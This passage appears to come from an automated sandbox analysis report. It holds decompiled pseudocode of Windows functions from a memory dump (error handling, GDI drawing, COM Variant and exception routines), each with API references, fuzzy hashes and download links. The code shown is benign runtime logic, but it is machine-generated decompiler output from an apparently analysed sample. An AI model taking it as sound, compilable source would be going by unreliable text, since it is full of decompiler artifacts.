						_t18 = E00CE3C3D(_t14, 1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E00CE358C(__eflags,  *0xd0f060, _t18);
							if(__eflags != 0) {
								E00CE5588(_t21, _t18, 0xe3a01c);
								E00CE46CC(0);
								goto L13;
							} else {
								_t13 = 0;
								E00CE358C(__eflags,  *0xd0f060, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E00CE358C(0,  *0xd0f060, 0);
							_push(0);
							L9:
							E00CE46CC();
							goto L4;
						}
					}
				} else {
					_t18 = E00CE354D(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0xd0f060; // 0x6
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x00ce5a6d
0x00ce5a78
0x00ce5a7a
0x00ce5a7f
0x00ce5a82
0x00ce5aa0
0x00ce5aa3
0x00ce5aa8
0x00ce5aaa
0x00000000
0x00ce5aac
0x00ce5ab8
0x00ce5abc
0x00ce5abe
0x00ce5ae3
0x00ce5ae5
0x00ce5afe
0x00ce5b05
0x00000000
0x00ce5ae7
0x00ce5ae7
0x00ce5af0
0x00ce5af5
0x00000000
0x00ce5af5
0x00ce5ac0
0x00ce5ac0
0x00ce5ac0
0x00ce5ac9
0x00ce5ace
0x00ce5acf
0x00ce5acf
0x00000000
0x00ce5ad4
0x00ce5abe
0x00ce5a84
0x00ce5a8a
0x00ce5a8e
0x00ce5a9b
0x00000000
0x00ce5a90
0x00ce5a93
0x00ce5b0d
0x00ce5b0d
0x00ce5a95
0x00ce5a95
0x00ce5a95
0x00ce5a97
0x00ce5a97
0x00ce5a97
0x00ce5a93
0x00ce5a8e
0x00ce5b10
0x00ce5b18
0x00ce5b21

APIs

GetLastError.KERNEL32(?,?,?,00CDC0C9,00CB10CE), ref: 00CE5A72
_free.LIBCMT ref: 00CE5ACF
_free.LIBCMT ref: 00CE5B05
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CDC0C9,00CB10CE), ref: 00CE5B10

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 4046ba9e6f5d17d51201f0dd6ac5be2b34b68068f7fd5671260280d5e222b2f5
Instruction ID: 404013dde4d0cdc9ea4440b47c1f0a8a93c3ff8fc3bb10817a2299d77958c3b3
Opcode Fuzzy Hash: 4046ba9e6f5d17d51201f0dd6ac5be2b34b68068f7fd5671260280d5e222b2f5
Instruction Fuzzy Hash: 67118272245BC56AD711677B9CCAB3B2559ABC57B8B380338F539D72E2D9218E00B620

Uniqueness

Uniqueness Score: -1.00%

Function 00CB7D33, Relevance: 6.1, APIs: 4, Instructions: 60
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00CB7D33(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v136;
				CHAR* _v140;
				void* __ebp;
				signed int _t20;
				int _t27;
				intOrPtr _t41;
				void* _t47;
				CHAR* _t49;
				int* _t51;
				signed int _t52;

				_t47 = __edx;
				_t20 =  *0xd0f014; // 0xbb5e653b
				_v8 = _t20 ^ _t52;
				_t41 = _a4;
				_v140 =  &_v136;
				E00CBA4C0( &_v136, _t41,  &_v140, __edi, __esi,  *((intOrPtr*)(__ecx + 0xdc)), 3);
				_t49 = _v140;
				if(_t49 !=  &_v136) {
					E00CDC163(_t49);
				}
				_t51 =  *(_t41 + 0x18);
				Rectangle( *(_t41 + 0x14),  *_t51, _t51[1], _t51[2], _t51[3]);
				SetTextAlign( *(_t41 + 0x14), 0x1e);
				_t27 = lstrlenA(_t49);
				asm("cdq");
				asm("cdq");
				TextOutA( *(_t41 + 0x14), _t51[2] +  *_t51 - _t47 >> 1, _t51[1] + _t51[3] - _t47 >> 1, _t49, _t27);
				return E00CBDC11(_v8 ^ _t52);
			}

0x00cb7d33
0x00cb7d3c
0x00cb7d43
0x00cb7d47
0x00cb7d60
0x00cb7d66
0x00cb7d6b
0x00cb7d79
0x00cb7d7c
0x00cb7d81
0x00cb7d82
0x00cb7d93
0x00cb7d9e
0x00cb7da5
0x00cb7db2
0x00cb7dbe
0x00cb7dc7
0x00cb7ddd

APIs

Rectangle.GDI32(?,?,?,?,?), ref: 00CB7D93
SetTextAlign.GDI32(?,0000001E), ref: 00CB7D9E
lstrlenA.KERNEL32(?), ref: 00CB7DA5
TextOutA.GDI32(?,?,?,?,00000000), ref: 00CB7DC7

Part of subcall function 00CDC163: _free.LIBCMT ref: 00CDC176

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: Text$AlignRectangle_freelstrlen
String ID:
API String ID: 3109082682-0
Opcode ID: 26628d3cc1a09c9a17b365acbb9afc2f2e09ba125eb2d0446639ca433379716e
Instruction ID: 87879a7193d881dd85d641e2457b3c11e4e8873fda48013a0ee27275f5d3733f
Opcode Fuzzy Hash: 26628d3cc1a09c9a17b365acbb9afc2f2e09ba125eb2d0446639ca433379716e
Instruction Fuzzy Hash: 9F115B31500109AFCB209F68DD85F9FBBBAFF48304F408469F689D6161DA31E954EF61

Uniqueness

Uniqueness Score: -1.00%

Function 00CB19F7, Relevance: 6.0, APIs: 4, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00CB19F7(void* __ebx, intOrPtr* __ecx, void* __edi, void* __eflags) {
				void* _t13;
				void* _t18;
				intOrPtr* _t22;
				void* _t24;
				intOrPtr* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t22 = __ecx;
				_t21 = __ebx;
				_push(0x14);
				E00CFBEFA(0xcfc8e8, __ebx, __edi);
				_t26 = _t22;
				_t27 =  *((intOrPtr*)(_t29 + 0xc));
				if(_t27 == 0 || _t27 ==  *_t26) {
					_t13 = E00CB1A6F(_t21, _t22, _t24, _t26, __eflags,  *((intOrPtr*)(_t29 + 8)));
				} else {
					E00CC1E00(_t26, _t29 - 0x20, 0, 0x10);
					__imp__#8(_t29 - 0x20);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t18 = _t29 - 0x20;
					__imp__#12(_t18, _t26, 0, _t27);
					_t28 = _t18;
					_t35 = _t28;
					if(_t28 >= 0) {
						_t28 = E00CB1A6F(_t21, _t29 - 0x20, _t24, _t26, _t35,  *((intOrPtr*)(_t29 + 8)));
					}
					__imp__#9(_t29 - 0x20);
					_t13 = _t28;
				}
				return E00CFBEC3(_t13);
			}

0x00cb19f7
0x00cb19f7
0x00cb19f7
0x00cb19fe
0x00cb1a03
0x00cb1a05
0x00cb1a0b
0x00cb1a62
0x00cb1a12
0x00cb1a1a
0x00cb1a26
0x00cb1a2c
0x00cb1a30
0x00cb1a38
0x00cb1a3e
0x00cb1a40
0x00cb1a42
0x00cb1a4f
0x00cb1a4f
0x00cb1a55
0x00cb1a5b
0x00cb1a5b
0x00cb1a6c

APIs

__EH_prolog3.LIBCMT ref: 00CB19FE
VariantInit.OLEAUT32(?), ref: 00CB1A26
VariantChangeType.OLEAUT32(?,?,00000000,00000000), ref: 00CB1A38
VariantClear.OLEAUT32(?), ref: 00CB1A55

Part of subcall function 00CB1A6F: __EH_prolog3.LIBCMT ref: 00CB1A76

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$H_prolog3$ChangeClearInitType
String ID:
API String ID: 4262505642-0
Opcode ID: 135de9368c03d4805d58a8380b75d33f62ee0b48c398d4b17d1c8893d210917e
Instruction ID: d7be960d58126f83f4cce6c008ae64f982a054188c23823912dedd3fb65a9c2c
Opcode Fuzzy Hash: 135de9368c03d4805d58a8380b75d33f62ee0b48c398d4b17d1c8893d210917e
Instruction Fuzzy Hash: AD01EC76901118ABCF11ABA4DC59FED7B69AF08B50F484019FE01BB151DB74AE04E7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00CBBB5B, Relevance: 6.0, APIs: 4, Instructions: 21COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00CBBB62
VariantCopy.OLEAUT32(?,?), ref: 00CBBB6C
_com_issue_error.COMSUPP ref: 00CBBB7E
VariantClear.OLEAUT32 ref: 00CBBB85

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearCopyInit_com_issue_error
String ID:
API String ID: 309108855-0
Opcode ID: 161386d0a9b4e0474aa97d76de639243cc5178b10ee8b98d0037a9eea18e541d
Instruction ID: be87add5a6ba5784e19500c4d18d8c213704b72d2edef027dc87ab89057b9726
Opcode Fuzzy Hash: 161386d0a9b4e0474aa97d76de639243cc5178b10ee8b98d0037a9eea18e541d
Instruction Fuzzy Hash: 02D05E722011387B9A143BE5AC0CEDE7E1CDE05AB17000029F605D2021DB65D900D7F6

Uniqueness

Uniqueness Score: -1.00%

Function 00CB625F, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 196
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00CB625F(void* __ebx, struct HDC__* __ecx, void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v44;
				void* __ebp;
				signed int _t45;
				int _t51;
				signed int _t52;
				intOrPtr _t58;
				void* _t61;
				char _t66;
				void* _t67;
				void* _t68;
				char _t73;
				void* _t74;
				void* _t75;
				char _t80;
				void* _t81;
				void* _t82;
				struct HDC__* _t86;
				intOrPtr* _t91;
				intOrPtr* _t92;
				void* _t115;
				intOrPtr* _t124;
				char _t125;
				void* _t127;
				signed int _t128;
				void* _t129;
				void* _t131;

				_t115 = __edx;
				_t45 =  *0xd0f014; // 0xbb5e653b
				_v8 = _t45 ^ _t128;
				_t124 = 0;
				_t127 = 0;
				_v16 = 0;
				if(__edx == 0) {
					__eflags = __ecx;
					if(__ecx == 0) {
						L36:
						_push(_t124);
						_push(_t124);
						_push(_t124);
						_push("DISPLAY");
						L37:
						CreateDCA();
						while(_t127 != 0) {
							_t127 =  *_t127;
							E00CDC163(_t127);
						}
						L40:
						return E00CBDC11(_v8 ^ _t128);
					}
					_t51 = GetDeviceCaps(__ecx, 2);
					__eflags = _t51 - 5;
					if(_t51 != 5) {
						goto L40;
					}
					goto L36;
				}
				_t52 =  *(__edx + 0xa) & 0x0000ffff;
				_t91 = 0;
				if(_t52 != 0) {
					_t91 = __edx + _t52;
				}
				_v28 = ( *(_t115 + 4) & 0x0000ffff) + _t115;
				_v24 = ( *(_t115 + 6) & 0x0000ffff) + _t115;
				_t58 = ( *(_t115 + 8) & 0x0000ffff) + _t115;
				_v20 = _t58;
				if(_t91 != 0) {
					_t100 = ( *(_t91 + 0x46) & 0x0000ffff) + 0x9c;
					__eflags = ( *(_t91 + 0x46) & 0x0000ffff) + 0x9c - 0x400;
					if(__eflags > 0) {
						L8:
						__eflags = ( *(_t91 + 0x46) & 0x0000ffff) + 0x9c;
						_t61 = E00CB9AD3( &_v16, _t115, ( *(_t91 + 0x46) & 0x0000ffff) + 0x9c, ( *(_t91 + 0x46) & 0x0000ffff) + 0x9c);
						_t127 = _v16;
						L9:
						_v32 = E00CB130E(_t61, _t91);
						_t58 = _v20;
						goto L10;
					}
					_t86 = E00CB11E1(_t100, __eflags);
					__eflags = _t86;
					if(_t86 == 0) {
						goto L8;
					}
					E00CBEB70();
					_t61 = _t129;
					goto L9;
				} else {
					_v32 = _t124;
					L10:
					if(_t58 == 0) {
						L12:
						_v20 = _t124;
						L18:
						_t63 = _v24;
						if(_v24 == 0) {
							L20:
							_t92 = _t124;
							L26:
							_t64 = _v28;
							if(_v28 != 0) {
								_t66 = E00CDCACF(_t64) + 1;
								_t117 = _t66;
								_v12 = _t66;
								_t67 = E00CB1160( &_v12, _t66);
								_t131 = _t129 + 4;
								if(_t67 >= 0) {
									_t125 = _v12;
									_t141 = _t125 - 0x400;
									if(_t125 > 0x400 || E00CB11E1(_t125, _t141) == 0) {
										_t68 = E00CB9AD3( &_v16, _t117, __eflags, _t125);
										_t127 = _v16;
									} else {
										E00CBEB70();
										_t68 = _t131;
									}
									_t124 = E00CB1288(_t68, _v28, _t125, 3);
								}
							}
							_push(_v32);
							_push(_v20);
							_push(_t92);
							_push(_t124);
							goto L37;
						}
						_t73 = E00CDCACF(_t63) + 1;
						_t119 = _t73;
						_v12 = _t73;
						_t74 = E00CB1160( &_v12, _t73);
						_t129 = _t129 + 4;
						if(_t74 >= 0) {
							_t93 = _v12;
							__eflags = _v12 - 0x400;
							if(__eflags > 0) {
								L24:
								_t75 = E00CB9AD3( &_v16, _t119, __eflags, _t93);
								_t127 = _v16;
								L25:
								_t92 = E00CB1288(_t75, _v24, _t93, 3);
								goto L26;
							}
							__eflags = E00CB11E1(_t93, __eflags);
							if(__eflags == 0) {
								goto L24;
							}
							E00CBEB70();
							_t75 = _t129;
							goto L25;
						}
						goto L20;
					}
					_t80 = E00CDCACF(_t58) + 1;
					_t121 = _t80;
					_v12 = _t80;
					_t81 = E00CB1160( &_v12, _t80);
					_t129 = _t129 + 4;
					if(_t81 >= 0) {
						_t94 = _v12;
						__eflags = _v12 - 0x400;
						if(__eflags > 0) {
							L16:
							_t82 = E00CB9AD3( &_v16, _t121, __eflags, _t94);
							_t127 = _v16;
							L17:
							_v20 = E00CB1288(_t82, _v20, _t94, 3);
							goto L18;
						}
						__eflags = E00CB11E1(_t94, __eflags);
						if(__eflags == 0) {
							goto L16;
						}
						E00CBEB70();
						_t82 = _t129;
						goto L17;
					}
					goto L12;
				}
			}

0x00cb625f
0x00cb6265
0x00cb626c
0x00cb6272
0x00cb6276
0x00cb6278
0x00cb627d
0x00cb6431
0x00cb6433
0x00cb6443
0x00cb6443
0x00cb6444
0x00cb6445
0x00cb6446
0x00cb644b
0x00cb644b
0x00cb645e
0x00cb6456
0x00cb6458
0x00cb645d
0x00cb6462
0x00cb6475
0x00cb6475
0x00cb6438
0x00cb643e
0x00cb6441
0x00000000
0x00000000
0x00000000
0x00cb6441
0x00cb6283
0x00cb6287
0x00cb628c
0x00cb628e
0x00cb628e
0x00cb6297
0x00cb62a0
0x00cb62a7
0x00cb62a9
0x00cb62ae
0x00cb62b9
0x00cb62bf
0x00cb62c5
0x00cb62e2
0x00cb62e9
0x00cb62ef
0x00cb62f4
0x00cb62f7
0x00cb6300
0x00cb6303
0x00000000
0x00cb6303
0x00cb62c7
0x00cb62cc
0x00cb62ce
0x00000000
0x00000000
0x00cb62d9
0x00cb62de
0x00000000
0x00cb62b0
0x00cb62b0
0x00cb6306
0x00cb6308
0x00cb6325
0x00cb6325
0x00cb6367
0x00cb6367
0x00cb636c
0x00cb6389
0x00cb6389
0x00cb63c9
0x00cb63c9
0x00cb63ce
0x00cb63d6
0x00cb63da
0x00cb63dc
0x00cb63df
0x00cb63e4
0x00cb63e9
0x00cb63eb
0x00cb63ee
0x00cb63f4
0x00cb6410
0x00cb6415
0x00cb6401
0x00cb6403
0x00cb6408
0x00cb6408
0x00cb6425
0x00cb6425
0x00cb63e9
0x00cb6427
0x00cb642a
0x00cb642d
0x00cb642e
0x00000000
0x00cb642e
0x00cb6374
0x00cb6378
0x00cb637a
0x00cb637d
0x00cb6382
0x00cb6387
0x00cb638d
0x00cb6390
0x00cb6396
0x00cb63ae
0x00cb63b2
0x00cb63b7
0x00cb63ba
0x00cb63c7
0x00000000
0x00cb63c7
0x00cb639f
0x00cb63a1
0x00000000
0x00000000
0x00cb63a5
0x00cb63aa
0x00000000
0x00cb63aa
0x00000000
0x00cb6387
0x00cb6310
0x00cb6314
0x00cb6316
0x00cb6319
0x00cb631e
0x00cb6323
0x00cb632a
0x00cb632d
0x00cb6333
0x00cb634b
0x00cb634f
0x00cb6354
0x00cb6357
0x00cb6364
0x00000000
0x00cb6364
0x00cb633c
0x00cb633e
0x00000000
0x00000000
0x00cb6342
0x00cb6347
0x00000000
0x00cb6347
0x00000000
0x00cb6323

APIs

GetDeviceCaps.GDI32(?,00000002), ref: 00CB6438
CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00CB644B

Strings

DISPLAY, xrefs: 00CB6446

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsCreateDevice
String ID: DISPLAY
API String ID: 774442635-865373369
Opcode ID: 367c9d301577c30eebc3b1144147d0a51f876f06bfbf6da6a9ae616d1018b2bd
Instruction ID: 32dac77653901677a90d4d0ee09e30fff206bbf29446c3900d2526a6c6e7c5aa
Opcode Fuzzy Hash: 367c9d301577c30eebc3b1144147d0a51f876f06bfbf6da6a9ae616d1018b2bd
Instruction Fuzzy Hash: 91519161F002159BDF10EBA9C8916FEB7B5EF44704F184069EA12E7352EA38DE41AB90

Uniqueness

Uniqueness Score: -1.00%

Function 00CBED8A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00CBED8A(void* __ecx, void* __eflags, intOrPtr _a4) {
				char _v20;
				void* _t9;
				intOrPtr _t10;
				intOrPtr _t14;
				void* _t19;
				void* _t20;
				char* _t21;
				void* _t24;
				void* _t27;

				_t19 = __ecx;
				_t24 = _t27;
				while(1) {
					_push(_a4);
					_t9 = E00CDCF9E(_t19);
					_pop(_t20);
					if(_t9 != 0) {
						break;
					}
					_t10 = E00CE0DDE(_t20, __eflags, _a4);
					_pop(_t19);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags = _a4 - 0xffffffff;
						if(_a4 != 0xffffffff) {
							_push(_t24);
							_t24 = _t27;
							_t27 = _t27 - 0xc;
							E00CBF1A5( &_v20);
							E00CC2734( &_v20, 0xd0bba4);
							asm("int3");
						}
						_push(_t24);
						_t21 =  &_v20;
						E00CBF1D8(_t21);
						E00CC2734( &_v20, 0xd0bbf8);
						asm("int3");
						_t14 =  *((intOrPtr*)(_t21 + 4));
						__eflags = _t14;
						if(_t14 == 0) {
							return "Unknown exception";
						}
						return _t14;
					} else {
						continue;
					}
					L10:
				}
				return _t9;
				goto L10;
			}

0x00cbed8a
0x00cbed8b
0x00cbed9c
0x00cbed9c
0x00cbed9f
0x00cbeda4
0x00cbeda7
0x00000000
0x00000000
0x00cbed92
0x00cbed97
0x00cbed98
0x00cbed9a
0x00cbedab
0x00cbedaf
0x00cbf2f3
0x00cbf2f4
0x00cbf2f6
0x00cbf2fc
0x00cbf30a
0x00cbf30f
0x00cbf30f
0x00cbf310
0x00cbf316
0x00cbf319
0x00cbf327
0x00cbf32c
0x00cbf32d
0x00cbf330
0x00cbf332
0x00000000
0x00cbf334
0x00cbf339
0x00000000
0x00000000
0x00000000
0x00000000
0x00cbed9a
0x00cbedaa
0x00000000

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00CBF30A

Part of subcall function 00CC2734: RaiseException.KERNEL32(?,?,?,?), ref: 00CC2794

__CxxThrowException@8.LIBVCRUNTIME ref: 00CBF327

Strings

Unknown exception, xrefs: 00CBF334

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 160768fd5f8f0a872fceebf710c2db4126ccc0e6f8ebbfe4f38a0b6d629a9111
Instruction ID: 054ab6ed5e49b2e0f1460f2340540859afe3172361391b27d5ae21840b8f7f3f
Opcode Fuzzy Hash: 160768fd5f8f0a872fceebf710c2db4126ccc0e6f8ebbfe4f38a0b6d629a9111
Instruction Fuzzy Hash: 30F0C23490420DBBCF04BAB9EC56ADD376C5E00710F604679F928D26D1EBB0EB5B9691

Uniqueness

Uniqueness Score: -1.00%

Function 00CBBC44, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00CBBC44(intOrPtr _a4) {
				void* _t13;
				intOrPtr _t14;
				intOrPtr* _t18;
				void* _t21;
				void* _t22;
				intOrPtr _t24;

				_t24 = _a4;
				if( *((char*)(_t24 + 0xcc)) == 0) {
					return 0;
				}
				_t13 = E00CBB7B4( *((intOrPtr*)(_t24 + 0xd0)),  *((intOrPtr*)(_t24 + 0xc4)));
				 *((intOrPtr*)(_t24 + 0xc4)) = 0xfefefefe;
				_t22 = _t13;
				_t18 =  *((intOrPtr*)(_t24 + 0xd0));
				_t14 =  *((intOrPtr*)( *_t18 + 8))(_t18, _t21);
				if(_t22 == 0) {
					 *((char*)(_t24 + 0xcc)) = 0;
					__imp__#6( *((intOrPtr*)(_t24 + 0xe0)));
					__imp__#2(L"urmom");
					 *((intOrPtr*)(_t24 + 0xe0)) = _t14;
					E00CB7968(_t24 + 4);
				}
				return _t22;
			}

0x00cbbc48
0x00cbbc52
0x00000000
0x00cbbcb3
0x00cbbc61
0x00cbbc66
0x00cbbc70
0x00cbbc72
0x00cbbc7b
0x00cbbc80
0x00cbbc88
0x00cbbc8f
0x00cbbc9a
0x00cbbca3
0x00cbbca9
0x00cbbca9
0x00000000

APIs

SysFreeString.OLEAUT32(?), ref: 00CBBC8F
SysAllocString.OLEAUT32(urmom), ref: 00CBBC9A

Part of subcall function 00CB7968: InvalidateRect.USER32(?,00000000,00000001,00CB770A), ref: 00CB797C

Strings

urmom, xrefs: 00CBBC95

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFreeInvalidateRect
String ID: urmom
API String ID: 3957901065-2807022155
Opcode ID: 0309ebd7b95a57165da804f10a9b8d4c21ca231e52ef4ccb0830fd894ddca1cb
Instruction ID: 4700c5cc55f742151b112d9302d0ed389d6daa99446ed01e75e2569594c096a3
Opcode Fuzzy Hash: 0309ebd7b95a57165da804f10a9b8d4c21ca231e52ef4ccb0830fd894ddca1cb
Instruction Fuzzy Hash: 6AF03C32204A449BD725DBB5C814F9ABBA5BB84350F14896DE19E93350CBB0A804DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00CB3023, Relevance: 5.0, APIs: 4, Instructions: 44
stringCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00CB3023(CHAR* __ecx, short* __edx) {
				CHAR* _t12;
				short* _t13;

				_t12 = __ecx;
				_t13 = __edx;
				if(lstrcmpiA(__ecx, "S") != 0) {
					if(lstrcmpiA(_t12, "M") != 0) {
						if(lstrcmpiA(_t12, "D") != 0) {
							if(lstrcmpiA(_t12, "B") != 0) {
								 *_t13 = 0;
								return 0;
							}
							_push(0x11);
							L2:
							_pop(0x4008);
							L3:
							 *_t13 = 0x4008;
							return 1;
						}
						_push(0x13);
						goto L2;
					}
					goto L3;
				}
				_push(8);
				goto L2;
			}

0x00cb302c
0x00cb302e
0x00cb303a
0x00cb3051
0x00cb3064
0x00cb3074
0x00cb307c
0x00000000
0x00cb307c
0x00cb3076
0x00cb303e
0x00cb303e
0x00cb303f
0x00cb303f
0x00000000
0x00cb3044
0x00cb3066
0x00000000
0x00cb3066
0x00000000
0x00cb3053
0x00cb303c
0x00000000

APIs

lstrcmpiA.KERNEL32(?,00D07888,?,?,00000000,00CB32E2,BB5E653B,?,?,?,?,?,00CFCB30,000000FF), ref: 00CB3036
lstrcmpiA.KERNEL32(?,00D0788C,?,?,?,?,?,00CFCB30,000000FF), ref: 00CB304D
lstrcmpiA.KERNEL32(?,00D07890,?,?,?,?,?,00CFCB30,000000FF), ref: 00CB3060
lstrcmpiA.KERNEL32(?,00D07894,?,?,?,?,?,00CFCB30,000000FF), ref: 00CB3070

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: a18e18c728e1059b2f5868c2454bdbec859a8ef7dfa47138a3286e6aa625a7bc
Instruction ID: 94efdce427d05d2edf24bc704bbc12e58f3370691d7543cd5a26b52aaea3ceba
Opcode Fuzzy Hash: a18e18c728e1059b2f5868c2454bdbec859a8ef7dfa47138a3286e6aa625a7bc
Instruction Fuzzy Hash: 60F082227583C3A6D334317A6CD5BFB05989FB5B51F104036F159EA180E684DA45A236

Uniqueness

Uniqueness Score: -1.00%

Function 00CBCB32, Relevance: 5.0, APIs: 4, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00CBCB32(void* __ecx) {
				void* __edi;
				long _t7;
				void* _t13;
				intOrPtr* _t19;
				void* _t21;

				_t13 = __ecx;
